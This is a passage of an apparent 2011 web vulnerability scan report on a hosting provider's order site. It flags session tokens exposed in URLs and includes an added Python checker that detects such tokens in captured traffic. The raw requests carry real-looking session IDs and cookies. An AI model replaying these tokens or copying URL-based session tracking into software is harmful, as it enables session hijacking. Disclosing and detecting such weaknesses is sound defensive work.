Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.62. http://order.1and1.com/xml/order/FeatureSite-buildingRss

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingRss

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; note that the server answered with a 301 whose Location omits the token:

Request

GET /xml/order/FeatureSite-buildingRss;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingRss?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.63. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; note that the server answered with a 301 whose Location omits the token:

Request

GET /xml/order/FeatureSite-buildingWsb;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingWsb?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.64. http://order.1and1.com/xml/order/FeatureToolsRatepoint

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureToolsRatepoint

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; note that the server answered with a 301 whose Location omits the token:

Request

GET /xml/order/FeatureToolsRatepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureToolsRatepoint?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.65. http://order.1and1.com/xml/order/FeatureWebdesignIstock

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebdesignIstock

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; note that the server answered with a 301 whose Location omits the token:

Request

GET /xml/order/FeatureWebdesignIstock;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureWebdesignIstock?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.66. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The response rewrites the session token into the following links (the ;jsessionid= path parameter is appended to every navigation URL), so the token propagates to each subsequent request and to any link that is copied, bookmarked or shared:

Request

GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:11 GMT; Path=/
ETag: 1bb8645f85cd004134e2d01fcda6ff8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17511


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureWebspaceExplorer&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureWebspaceExplorer&amp;page=switch&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureWebspaceExplorer&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...
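
The findings above come in two forms: 3.59 to 3.65 show the token in the request URL, with the server answering 301 to a Location that no longer carries it, and 3.66 shows the token rewritten into every link of a 200 response. The script below is an added example, not part of the scanner output or of the site's own code; it reproduces that check over a captured request/response pair by pulling session-like identifiers out of the path parameters and query string of the request target, testing whether a redirect Location kept the token, and scanning the href attributes of the body. The sample messages, host name and token value are constructed to mirror the shapes on this page, and the list of session parameter names is an assumption to be extended for the application under test.

```python
"""Session-token-in-URL check over a captured HTTP exchange.
Added example, not part of the scanner report or the target site's code.
The sample traffic is constructed to mirror findings 3.59-3.66; the host,
token value and the dotted worker suffix are made up."""
import re
from html import unescape
from urllib.parse import parse_qsl, urlsplit

# Parameter names treated as session identifiers.  Assumption: extend this
# list for the application under test.
SESSION_PARAM_NAMES = {"jsessionid", "phpsessid", "sessionid", "sid", "aspsessionid"}

# Servlet-style path parameter: /path;name=value  (value may end in .jvmRoute)
PATH_PARAM_RE = re.compile(r";([A-Za-z_][\w-]*)=([^/;?#]+)")


def tokens_in_url(url):
    """Return [(where, name, value)] for session identifiers in a URL or
    request-target; where is 'path' for ;name=value, 'query' for ?name=value."""
    found = []
    parts = urlsplit(url)  # urlsplit keeps ;params inside .path
    for name, value in PATH_PARAM_RE.findall(parts.path):
        if name.lower() in SESSION_PARAM_NAMES:
            found.append(("path", name, value))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in SESSION_PARAM_NAMES:
            found.append(("query", name, value))
    return found


def parse_http(raw):
    """Split a raw HTTP/1.x message into (start line, {header: value}, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def analyse_exchange(raw_request, raw_response):
    """Locate session tokens in the request URL, in a redirect Location and in
    the href attributes of the response body."""
    request_line, _, _ = parse_http(raw_request)
    _method, target, _version = request_line.split()
    status_line, headers, body = parse_http(raw_response)
    report = {
        "status": int(status_line.split()[1]),
        "request_url": tokens_in_url(target),
        "redirect_drops_token": None,  # only meaningful when Location is present
        "response_links": [],
    }
    if "location" in headers:
        sent = {v for _, _, v in report["request_url"]}
        kept = {v for _, _, v in tokens_in_url(headers["location"])}
        report["redirect_drops_token"] = bool(sent) and not (sent & kept)
    for href in re.findall(r'href="([^"]+)"', body, re.IGNORECASE):
        # hrefs are HTML-escaped (&amp;), so unescape before URL parsing
        report["response_links"].extend(tokens_in_url(unescape(href)))
    return report


def verdict(report):
    """One-line summary matching the two issue-detail variants in the report."""
    notes = []
    if report["request_url"]:
        notes.append("session token in request URL")
        if report["redirect_drops_token"]:
            notes.append("redirect Location omits the token")
    if report["response_links"]:
        notes.append("%d response link(s) carry a session token" % len(report["response_links"]))
    return "; ".join(notes) or "no session token in URL"


# Constructed samples shaped like the captures in this report (not real traffic).
TOKEN = "0123456789ABCDEF0123456789ABCDEF.node1"
SAMPLE_REQUEST = (
    "GET /xml/order/FeatureSite-buildingMap;jsessionid=%s?__frame=_top&__lf=Static HTTP/1.1\r\n"
    "Host: order.example.test\r\nCookie: UT=opaque\r\n\r\n" % TOKEN
)
SAMPLE_REDIRECT = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: http://order.example.test/xml/order/FeatureSite-buildingMap?__frame=_top&__lf=Static\r\n"
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_PAGE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html;charset=UTF-8\r\n\r\n"
    '<a href="/xml/order/Home;jsessionid=%s?__frame=_top&amp;__lf=Static">Home</a>\n'
    '<a href="/xml/order/Gtc;jsessionid=%s?__frame=_top">T&amp;C</a>\n'
    '<a href="/modules/skin/logo.png">logo</a>\n' % (TOKEN, TOKEN)
)

if __name__ == "__main__":
    for response in (SAMPLE_REDIRECT, SAMPLE_PAGE):
        print(verdict(analyse_exchange(SAMPLE_REQUEST, response)))
```

Run directly, it prints one verdict for the redirect case and one for the rewritten-links case. The dotted suffix after the identifier in the captures (.TCpfix140a, .TCpfix141a) is the form in which Tomcat appends a jvmRoute worker name, which points at URL rewriting by a servlet container; on Servlet 3.0 and later containers that rewriting is switched off by setting <session-config><tracking-mode>COOKIE</tracking-mode></session-config> in web.xml, after which the identifier travels only in the JSESSIONID cookie.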

3.67. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; here the server accepted the request and served the page (200):

Request

GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:11 GMT; Path=/
ETag: 1bb8645f85cd004134e2d01fcda6ff8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17511


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.68. http://order.1and1.com/xml/order/FirstWebsite

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FirstWebsite

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; note that the server answered with a 301 whose Location omits the token:

Request

